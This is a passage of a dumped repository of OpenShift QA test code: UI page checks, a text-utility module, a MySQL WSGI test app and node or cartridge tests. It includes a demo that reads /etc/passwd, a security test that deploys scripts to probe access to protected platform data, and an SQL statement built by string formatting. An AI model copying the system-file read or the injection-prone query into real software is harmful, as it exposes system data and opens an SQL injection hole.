web.assert_text_equal_by_xpath('Welcome to OpenShift',\n '''/html/body/div[@id='content']/div/div/div/div[3]/div/h1/div[1]''',\n 'Community page is missing')\n\n self.tearDown()\n\n return self.passed(\"CheckHomeContent test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo01)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of CheckHomeContent.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6631290912628174, "alphanum_fraction": 0.6727148294448853, "avg_line_length": 22.360000610351562, "blob_id": "65907a20c13590a378e4826f1227ad234c6f95e2", "content_id": "a08b77450a1b6bdac131dffe2c07834ac8815810", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5842, "license_type": "no_license", "max_line_length": 78, "num_lines": 250, "path": "/automation/open/lib/supports/textutils.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nGeneral text functions. You may import this instead of the stock\n\"string\" module in most cases.\n\n\"\"\"\n\nimport sys\nimport re\nimport binascii\n\nlowercase = 'abcdefghijklmnopqrstuvwxyz'\nuppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\ndigits = '0123456789'\nletters = lowercase + uppercase\nalphanumeric = lowercase + uppercase + digits\nwhitespace = ' \\t\\n\\r\\v\\f'\nCRLF = \"\\r\\n\"\npunctuation = \"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\"\"\"\nprintable = digits + letters + punctuation + whitespace\n\ndef cut_string(s, maxlen=800):\n\t\"\"\"Cuts a long string, returning the head and tail combined, with the\nmiddle missing. \"\"\"\n\tif len(s) <= maxlen:\n\t\treturn s\n\thalflen = (min(maxlen, len(s))/2)-6\n\treturn s[:halflen]+\"[...snip...]\"+s[-halflen:]\nsnip_string = cut_string # alias\n\ndef random_string(size):\n\t\"\"\"Return a string of length <size> with random alphanumeric\ncharacters in it.\"\"\"\n\timport random\n\trng = random.random\n\tlseq = len(alphanumeric)\n\tx = range(size)\n\tfor i in x:\n\t\tx[i] = alphanumeric[int(rng() * lseq)]\n\treturn \"\".join(x)\n\ndef crange(start, fin):\n\t\"\"\"like range(), but for characters.\"\"\"\n\tfor i in xrange(start, fin+1):\n\t\tyield chr(i)\n\ndef maketrans(s, d):\n\t\"\"\"maketrans(frm, to) -> string\n\tReturn a translation table (a string of 256 bytes long). \"\"\"\n\ttbl = range(256) \n\tfor src, dest in zip(s, d):\n\t\ttbl[ord(src)] = ord(dest)\n\treturn \"\".join(map(chr, tbl))\n\ntbl = [\"_\"]*256\nfor c in alphanumeric:\n\ttbl[ord(c)] = c\n_IDENTTABLE = \"\".join(tbl)\ndel tbl, c\n\ndef identifier(tag):\n\t\"\"\"Return a valid Python identifier given an arbitrary string.\"\"\"\n\ttag = str(tag)\n\treturn tag.translate(_IDENTTABLE).capitalize()\n\n# creating a new translation table all the time is annoying. This makes a\n# default one automatically.\ndef translate(string, frm, to, table=None, deletechars=None):\n\t\"\"\"Translate a string using table (one will be built if not supplied).\n\tFirst remove 'deletechars' characters from 'string', then translate the\n\t'from' characters to the 'to' characters.\"\"\"\n\ttable = table or maketrans(frm, to)\n\treturn string.translate(table, deletechars)\n\n# text filters follow\ndef grep(patt, *args):\n\t\"\"\"grep(pattern, objects...)\nreturns a list of matches given an object, which should usually be a list of\nstrings, but could be a single string.\t\"\"\"\n\tregex = re.compile(patt)\n\treturn filter(regex.search, _combine(args))\n\ndef cat(*args):\n\t\"\"\"cat(obj...)\nCombines all objects lines into one list.\"\"\"\n\treturn _combine(args)\n\ndef text(*args):\n\t\"\"\"text(object, ...)\nReturns all given objects as a single string.\"\"\"\n\treturn \"\".join(_combine(args))\n\ndef tac(*args):\n\t\"\"\"tac(obj...)\nCombines all objects lines into one list and returns them in reverse order.\"\"\"\n\tl = _combine(args)\n\tl.reverse()\n\treturn l\n\ndef head(*args):\n\t\"\"\"Returns the top 10 lines of the combined objects.\"\"\"\n\trv = [] ; c = 0\n\tfor arg in args:\n\t\tfor item in _tolist(arg):\n\t\t\tif c >= 10:\n\t\t\t\tbreak\n\t\t\trv.append(item)\n\t\t\tc += 1\n\treturn rv\n\ndef tail(*args):\n\t\"\"\"Returns the bottom 10 lines of the combined objects.\"\"\"\n\treturn _combine(args)[-10:]\n\ndef cksum(*args):\n\t\"\"\"cksum(args...)\nReturns the crc32 value of arguments.\"\"\"\n\tcrc = 0\n\tfor arg in args:\n\t\tfor item in _tolist(arg):\n\t\t\tcrc = binascii.crc32(str(item), crc)\n\treturn crc\n\ndef md5sum(*args):\n\t\"Return the MD5 sum of the arguments.\"\n\timport md5\n\tm = md5.new()\n\tfor arg in args:\n\t\tfor item in _tolist(arg):\n\t\t\tm.update(str(item))\n\treturn m.digest()\n\ndef sha1sum(*args):\n\t\"Return the SHA1 sum of the arguments.\"\n\timport sha\n\ts = sha.new()\n\tfor arg in args:\n\t\tfor item in _tolist(arg):\n\t\t\ts.update(str(item))\n\treturn s.digest()\n\ndef sort(*args):\n\t\"\"\"sort - Returns argument list sorted.\"\"\"\n\trv = _combine(args)\n\trv.sort()\n\treturn rv\n\ndef uniq(*args):\n\t\"Unique - returns the unique elements of the objects.\"\n\treturn removedups(_combine(args))\n\ndef wc(*args):\n\t\"Word count - returns a tuple of (lines, words, characters) of the objects.\"\n\tc = w = l = 0\n\tfor line in _combine(args):\n\t\tc += len(line)\n\t\tw += len(line.split())\n\t\tl += 1\n\treturn l, w, c\n\ndef nl(*args):\n\t\"line numbers - prepends line numbers to strings in list.\"\n\trv = []\n\tfor n, s in enumerate(_combine(args)):\n\t\trv.append(\"%6d\t%s\" % (n+1, s))\n\treturn rv\n\ndef cut(obj, chars=None, fields=None, delim=\"\\t\"):\n\t\"\"\"cut(obj, bytes=None, chars=None, fields=None, delim=\"\\t\")\nCut a section from the list of lines. arguments are tuples, except delim.\"\"\"\n\trv = []\n\tif chars:\n\t\tfor line in _tolist(obj):\n\t\t\tst, end = chars # a 2-tuple of start and end positions\n\t\t\trv.append(line[st:end])\n\telif fields:\n\t\tfor line in _tolist(obj):\n\t\t\twords = line.split(delim)\n\t\t\twl = []\n\t\t\tfor fn in fields:\n\t\t\t\twl.append(words[fn])\n\t\t\trv.append(tuple(wl))\n\telse:\n\t\traise ValueError, \"cut: you must specify either char range or fields\"\n\treturn rv\n\ndef hexdump(*args):\n\t\"return a hexadecimal string representation of argument lines.\"\n\ts = []\n\tfor line in _combine(args):\n\t\ts.append(binascii.hexlify(line))\n\treturn \"\".join(s)\n\ndef comm(obj1, obj2):\n\traise NotImplementedError\n\ndef csplit(*args):\n\traise NotImplementedError\n\ndef expand(*args):\n\traise NotImplementedError\n\ndef fold(*args):\n\traise NotImplementedError\n\ndef join(*args):\n\traise NotImplementedError\n\ndef od(*args):\n\traise NotImplementedError\n\ndef paste(*args):\n\traise NotImplementedError\n\ndef split(*args):\n\traise NotImplementedError\n\ndef unexpand(*args):\n\traise NotImplementedError\n\n# utility functions\ndef _tolist(obj):\n\t_to = type(obj)\n\tif _to is str:\n\t\treturn [obj]\n\telif issubclass(_to, file) or hasattr(obj, \"readlines\"):\n\t\treturn obj.readlines()\n\telse:\n\t\treturn list(obj)\n\ndef _combine(args):\n\tc = []\n\tfor arg in args:\n\t\tc.extend(_tolist(arg))\n\treturn c\n\n\ndef _test(argv):\n\tprint grep(\"b\", \"abacdefg\")\n\tprint grep(\"x\", \"abacdefg\")\n\tprint cut(file(\"/etc/passwd\"), fields=(0,), delim=\":\")\n\nif __name__ == \"__main__\":\n\timport sys\n\t_test(sys.argv)\n\n\n" }, { "alpha_fraction": 0.5987821221351624, "alphanum_fraction": 0.6112990379333496, "avg_line_length": 33.764705657958984, "blob_id": "8f9179553f2beb203698687ad088fc4ada855110", "content_id": "badf0498f9c6497ae73ba136abc96d5c26642f45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2956, "license_type": "no_license", "max_line_length": 128, "num_lines": 85, "path": "/automation/open/testmodules/RT/security/read_write_libra_important_data_devenv.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nJianlin Liu\[email protected]\nDec 30, 2011\n[security]Security - Write or modify libra important data\nhttps://tcms.engineering.redhat.com/case/122336/?from_plan=4962\n\"\"\"\n\nimport os\nimport sys\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n ITEST=\"DEV\"\n def initialize(self):\n self.summary = \"[security]Security - Write or modify libra important data on devenv instance\"\n self.app_type = common.app_types[\"php\"]\n self.app_name = \"SecurityTestApp\"\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass RWlibraImportantdata(OpenShiftTest):\n def test_method(self):\n self.info(\"Create a %s application\" %(self.app_type))\n ret = common.create_app(self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n \n \n self.assert_equal(ret, 0, \"%s app should be created successfully\" %(self.app_name))\n\n if (self.run_mode in (\"STG\", \"PROD\")):\n file_name1 = \"read_write_libra_important_data_stage.php\"\n file_name2 = \"read_write_libra_important_data_stage.sh\"\n elif (self.run_mode == \"DEV\"):\n file_name1 = \"read_write_libra_important_data_devenv.php\"\n file_name2 = \"read_write_libra_important_data_devenv.sh\"\n else:\n raise Exception(\"Unknown run mode\")\n source_file1 = \"%s/data/%s\" %(WORK_DIR, file_name1)\n source_file2 = \"%s/data/%s\" %(WORK_DIR, file_name2)\n target_file1 = \"%s/php/index.php\" %(self.app_name)\n target_file2 = \"%s/php/%s\" %(self.app_name, file_name2)\n self.info(\"Copying test files to app git repo\")\n ret = common.command_get_status(\"cp -f %s %s && cp -f %s %s\" %(source_file1, target_file1, source_file2, target_file2)) \n self.assert_equal(ret, 0,\"File and directories are added to your git repo successfully\")\n\n self.info(\"Do git commit\")\n ret = common.command_get_status(\"cd %s && git add . && git commit -m test && git push\" %(self.app_name))\n self.assert_equal(ret, 0, \"File and directories are added to your git repo successfully\")\n\n\n self.info(\"Get app url\") \n app_url = OSConf.get_app_url(self.app_name)\n\n self.info(\"Access app's URL to tigger test\")\n ret = common.grep_web_page(app_url, \"###RESULT###: PASS\")\n self.assert_equal(ret, 0)\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RWlibraImportantdata)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6227629780769348, "alphanum_fraction": 0.6453689336776733, "avg_line_length": 46.529850006103516, "blob_id": "1ae3f7c17a9e82a69a60ac88d0e16307d9a679fb", "content_id": "96e56c4fb08b29ce5d11aa3619709935dc2b3be1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6370, "license_type": "no_license", "max_line_length": 482, "num_lines": 134, "path": "/automation/open/testmodules/UI/web/case_173928.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_173928.py\n# Date: 2012/08/07 13:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckPricingPageLayout(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n \n #check with invalid password\n web.go_to_home()\n #web.click_element_by_xpath(\"//nav[@id='nav']/div/div/ul/li[4]/a/span\")\n web.click_element_by_xpath(\"//a[@href='/community/developers']\")\n web.click_element_by_xpath(\"//a[@href='/community/developers/pricing']\")\n web.assert_text_equal_by_xpath('''Pricing''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n\n web.assert_text_equal_by_xpath('''Our free Developer Preview version of OpenShift is currently available. We are planning to expand the OpenShift offering to provide users the ability to purchase increased capacity, functionality and support. The details below provide our pricing plans, which may be subject to change as we continue to fine tune the offering to address our customers needs. Sign up for the Developer Preview.''','''//div[@id='node-11187']/div/article/p''')\n \n #check the example part\n web.assert_text_equal_by_xpath('''What's a gear?''','''//div[@id='node-11187']/div/article/section[2]/h2''')\n web.assert_text_equal_by_xpath('''A gear is a resource constrained container that runs one or more user-specified software stacks, also known as cartridges. Each gear has a limited amount of RAM and disk space. If an application needs more resources, it can use multiple gears.''','''//div[@id='node-11187']/div/article/section[2]/div/div/p''')\n web.assert_text_equal_by_xpath('''Gears come in multiple sizes to suit the needs of various software stacks.''','''//div[@id='node-11187']/div/article/section[2]/div/div/p[2]''')\n web.assert_text_equal_by_xpath('''Let's look at an example app running on OpenShift''','''//div[@id='node-11187']/div/article/section[2]/h3''')\n web.assert_text_equal_by_xpath('''We can estimate the needs and costs of the app at different stages.''','''//div[@id='node-11187']/div/article/section[2]/p''')\n web.assert_text_equal_by_xpath('''Drupal-based Site''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div/h3''')\n web.assert_text_equal_by_xpath('''Standard Drupal 7 install with normal caching, mostly anonymous traffic, and a 2% update rate.''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div/p''')\n web.assert_text_equal_by_xpath('''Estimated costs assume the maximum number of gears running continuously, and include the platform fee where applicable but no add-ons.''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div/p[2]''')\n web.assert_text_equal_by_xpath('''Just starting up''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div[2]/h3''')\n web.assert_text_equal_by_xpath('''Pretty popular''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div[3]/h3''')\n web.assert_text_equal_by_xpath('''Making it Big''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div[4]/h3''')\n\n #check the FAQ part\n web.click_element_by_link_text('''What is the current status of OpenShift?''')\n time.sleep(2)\n web.check_title(\"What is the current status of OpenShift? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''What is Red Hat's plan with respect to OpenShift pricing?''')\n time.sleep(2)\n web.check_title(\"What is Red Hat's plan with respect to OpenShift pricing? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''Are there different Gear sizes and how much do they cost?''')\n time.sleep(2)\n web.check_title(\"Are there different gear sizes and how much do they cost? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''What are scaling threshold settings?''')\n time.sleep(2)\n web.check_title(\"What are scaling threshold settings? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''Do you offer support?''')\n time.sleep(2)\n web.check_title(\"Do you offer support? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''What is Add On Storage?''')\n time.sleep(2)\n web.check_title(\"What is Add On Storage? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''What will happen to the free resources that were offered during the Developer Preview phase?''')\n time.sleep(2)\n web.check_title(\"What will happen to the free resources that were offered during the Developer Preview phase? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''How do I get SSL for my domains?''')\n time.sleep(2)\n web.check_title(\"How do I get SSL for my domains? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''What is included with Java EE6 Full Profile & CDI?''')\n time.sleep(2)\n web.check_title(\"What is included with Java EE6 Full Profile & CDI? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''OpenShift FAQ''')\n time.sleep(2)\n web.check_title(\"Frequently Asked Questions | OpenShift by Red Hat\") \n web.go_back()\n time.sleep(2)\n\n self.tearDown()\n\n return self.passed(\" case_173928--CheckPricingPageLayout passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckPricingPageLayout)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_173928.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6168072819709778, "alphanum_fraction": 0.6239454746246338, "avg_line_length": 35.25882339477539, "blob_id": "1b7189122b1d8aace34e4948c5076e6bcacb2b5a", "content_id": "65fcc3606069c04418ba5f8098a866790eca2eda", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3082, "license_type": "no_license", "max_line_length": 255, "num_lines": 85, "path": "/automation/open/testmodules/RT/client/data/snapshot_restore_mysql_data/application.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport commands\nimport MySQLdb\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n\ndef create_data(speaker_val, title_val):\n content=\"Welcome~\\n\"\n try:\n con=MySQLdb.connect(host=os.environ['OPENSHIFT_MYSQL_DB_HOST'], user=os.environ['OPENSHIFT_MYSQL_DB_USERNAME'], passwd=os.environ['OPENSHIFT_MYSQL_DB_PASSWORD'], db=os.environ['OPENSHIFT_APP_NAME'], port=int(os.environ['OPENSHIFT_MYSQL_DB_PORT']))\n cursor = con.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS ucctalk\")\n cursor.execute(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n cursor.execute(\"INSERT INTO ucctalk (speaker,title) VALUES ('%s', '%s')\" %(speaker_val, title_val))\n cursor.execute(\"SELECT * FROM ucctalk\")\n alldata = cursor.fetchall()\n if alldata:\n for rec in alldata:\n content+=rec[0]+\", \"+rec[1]+\"\\n\"\n cursor.close()\n con.commit ()\n con.close()\n except Exception, e:\n content = str(e)\n return content\n\ndef show_data():\n content=\"Welcome~\\n\"\n try:\n con=MySQLdb.connect(host=os.environ['OPENSHIFT_MYSQL_DB_HOST'], user=os.environ['OPENSHIFT_MYSQL_DB_USERNAME'], passwd=os.environ['OPENSHIFT_MYSQL_DB_PASSWORD'], db=os.environ['OPENSHIFT_APP_NAME'], port=int(os.environ['OPENSHIFT_MYSQL_DB_PORT']))\n cursor = con.cursor()\n cursor.execute(\"SELECT * FROM ucctalk\")\n alldata = cursor.fetchall()\n if alldata:\n for rec in alldata:\n content+=rec[0]+\", \"+rec[1]+\"\\n\"\n cursor.close()\n con.commit ()\n con.close()\n except Exception, e:\n content = str(e)\n return content\n\n\ndef application(environ, start_response):\n\tctype = 'text/plain'\n\n target_file = \"%swsgi_data_test\" %(os.environ['OPENSHIFT_DATA_DIR'])\n\n\tif environ['PATH_INFO'] == '/health':\n\t\tresponse_body = \"1\"\n\telif environ['PATH_INFO'] == '/env':\n\t\tresponse_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n\t\tresponse_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/create':\n response_body = create_data(\"speaker1\",\"title1\")\n elif environ['PATH_INFO'] == '/modify':\n response_body = create_data(\"speaker2\",\"title2\")\n elif environ['PATH_INFO'] == '/show':\n response_body = show_data()\n\telse:\n\t\tresponse_body = 'Welcome to OpenShift'\n\n\tstatus = '200 OK'\n\tresponse_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n\t#\n\tstart_response(status, response_headers)\n\treturn [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n\tfrom wsgiref.simple_server import make_server\n\thttpd = make_server('localhost', 8051, application)\n\t# Wait for a single request, serve it and quit.\n\thttpd.handle_request()\n" }, { "alpha_fraction": 0.6052929162979126, "alphanum_fraction": 0.6168287992477417, "avg_line_length": 34.64516067504883, "blob_id": "58eb55f000fec0890b83e23b999431df02846487", "content_id": "f2173a125641bdbae3c07b5e9a1042b10511f009", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4421, "license_type": "no_license", "max_line_length": 374, "num_lines": 124, "path": "/automation/open/testmodules/RT/cartridge/override_jboss_server_modules.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1114][rhc-cartridge] Override jbossas-7 server modules with user's modules\nhttps://tcms.engineering.redhat.com/case/122350/\n\"\"\"\nimport os,sys,re,time\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1114][rhc-cartridge] Override jbossas-7 server modules with user's modules \" \n self.app_name = \"overridejboss\"\n self.app_type = common.app_types[\"jbossas\"]\n self.git_repo = \"./%s\" % (self.app_name)\n\n common.env_setup()\n common.clean_up(self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass OverrideJbossServerModules(OpenShiftTest):\n def test_method(self):\n\n # 1. Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an jbossas app: %s\" % (self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Create some directories and copy jboss modules into them\n cmd = \"mkdir -p %s/.openshift/config/modules/org/joda/time/main/ && cp %s/app_template/jodatime/{JodaTime.jar,module.xml} %s/.openshift/config/modules/org/joda/time/main/ && mkdir %s/src/main/webapp/WEB-INF/lib && cp %s/app_template/jodatime/test1.jar %s/src/main/webapp/WEB-INF/lib\" % (self.git_repo, WORK_DIR, self.git_repo, self.git_repo, WORK_DIR, self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\"2.Create some directories and copy jboss modules into them\",\n cmd,\n expect_description=\"Copy should succeed\",\n expect_return=0))\n\n # 3.Create time.jsp in the git repo\n time_jsp = \"\"\"<HTML>\n<HEAD>\n <TITLE>JBossAS7 Custom Modules Test Page</TITLE>\n <%@ page import=\"org.joda.time.DateTime\" %>\n <%@ page import=\"java.util.*\" %>\n</HEAD>\n<BODY>\n<h1>Customized org.joda.time.DateTime</h1>\n<pre>\n<%\nDateTime dt = new DateTime();\n%>\n<%= dt %>\n</pre>\n<h1>java.util.Date</h1>\n<pre>\n<%\nDate dt1 = new Date();\n%>\n<%= dt1 %>\n</pre>\n</BODY>\n</HTML>\"\"\"\n file_path = \"%s/src/main/webapp/time.jsp\" % (self.git_repo)\n cmd = \"echo '%s' > %s\" % (time_jsp, file_path)\n self.steps_list.append( testcase.TestCaseStep(\"3.Create time.jsp in the git repo\",\n cmd,\n expect_description=\"time.jsp should be created successfully\",\n expect_return=0))\n\n # 4.Git push all the changes\n self.steps_list.append( testcase.TestCaseStep(\"4.Git push all the changes\",\n \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),\n expect_description=\"time.jsp should be created successfully\",\n expect_return=0))\n\n # 5.Check time.jsp\n def get_app_url(app_name):\n def get_app_url2():\n return OSConf.get_app_url(self.app_name) + \"/time.jsp\"\n return get_app_url2\n\n self.steps_list.append( testcase.TestCaseStep(\"5.Check time.jsp\",\n common.grep_web_page,\n function_parameters=[get_app_url(self.app_name), \"Customized org.joda.time.DateTime\", \"-H 'Pragma: no-cache'\", 3, 6],\n expect_description=\"time.jsp should be able to work properly\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(OverrideJbossServerModules)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5334996581077576, "alphanum_fraction": 0.5443692207336426, "avg_line_length": 39.07143020629883, "blob_id": "2d28b0a43a34ac35efa97068e58318ba6b6c01b4", "content_id": "15d7d40d35d6d0b42c6d6960cb7c9d0700505347", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5612, "license_type": "no_license", "max_line_length": 154, "num_lines": 140, "path": "/automation/open/testmodules/RT/node/facter_active_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\n#\n# File name: facter_active_app.py\n# Date: 2012/02/24 05:04\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport re\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = 'DEV'\n\n def initialize(self):\n self.summary = \"[rhc-node] [US1734] New metric for facter reporting about the active applications on the current node\"\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n tcms_testcase_id = 130874\n self.steps= []\n if self.get_run_mode() == \"OnPremise\":\n self.origin_max_apps = 1000\n else:\n self.origin_max_apps = 80\n\n common.env_setup()\n\n\n def finalize(self):\n common.run_remote_cmd(None,\"sed -i s'/max_active_apps=.*/max_active_apps=%d/' /etc/openshift/resource_limits.conf\" % (self.origin_max_apps), True)\n\nclass FacterActiveApp(OpenShiftTest):\n def test_method(self):\n max_apps = 3\n destroy_apps = int(max_apps/2)\n #1) In the file '/etc/openshift/resource_limits.conf' change the value 'max_apps' to <max_apps>, change the value 'max_active_apps' to <max_apps>\n #common.run_remote_cmd(None,\"sed -i s'/max_apps=.*/max_apps=%d/' /etc/openshift/resource_limits.conf\" % (max_apps), as_root=True)\n #common.run_remote_cmd(None,\"sed -i s'/max_active_apps=.*/max_active_apps=%d/' /etc/openshift/resource_limits.conf\" % (max_apps), as_root=True)\n self.steps.append(testcase.TestCaseStep(\"Change the value of max_apps\",\n common.run_remote_cmd,\n function_parameters = [None,\"sed -i s'/max_active_apps=.*/max_active_apps=%d/' /etc/openshift/resource_limits.conf\" % (max_apps), True]))\n\n #2) Create <max_apps> applications\n for i in range(max_apps):\n self.steps.append(testcase.TestCaseStep(\"Create app#%d\"%i ,\n common.create_app,\n function_parameters=[self.app_name+\"%d\"%i, \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, False],\n expect_return=0))\n\n def verify_facter(percent):\n (status, output) = common.run_remote_cmd(None, 'facter active_capacity', True)\n if status!=0:\n return 1\n obj = re.search(r\"^%s\"%percent, output)\n if obj:\n return 0\n return 1\n\n self.steps.append(testcase.TestCaseStep(\"Verify the facter active_capacity\" ,\n verify_facter,\n function_parameters=[100],\n expect_description = \"Should be active_capacity => 100%\",\n expect_return=0))\n #3) Destroy <destroy_apps> application\n for i in range(destroy_apps):\n self.steps.append(testcase.TestCaseStep(\"Destroy app#%d\"%i ,\n common.destroy_app,\n function_parameters=[self.app_name+\"%d\"%i, \n self.user_email, \n self.user_passwd, True],\n expect_return=0))\n\n expect_capacity = int(float(max_apps - destroy_apps) / (max_apps) * 100)\n self.steps.append(testcase.TestCaseStep(\"Verify the facter active_capacity\" ,\n verify_facter,\n function_parameters=[expect_capacity],\n expect_description = \"Should be capacity => %d%%\" % (expect_capacity),\n expect_return=0))\n\n #4) Create <destroy_apps> new applications\n for i in range(destroy_apps):\n self.steps.append(testcase.TestCaseStep(\"Create app#%d\"%i ,\n common.create_app,\n function_parameters=[self.app_name+\"%d\"%i, \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, False],\n expect_return=0,\n try_count=3,\n try_interval=20))\n\n #5) Create an additional application\n self.steps.append(testcase.TestCaseStep(\"Create over limit app\",\n common.create_app,\n function_parameters = [self.app_name+\"OVER\", \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, False],\n expect_string_list = [\"No nodes available\",], \n expect_return=\"!0\"))\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(FacterActiveApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of facter_active_app.py \n#\n# vim: set 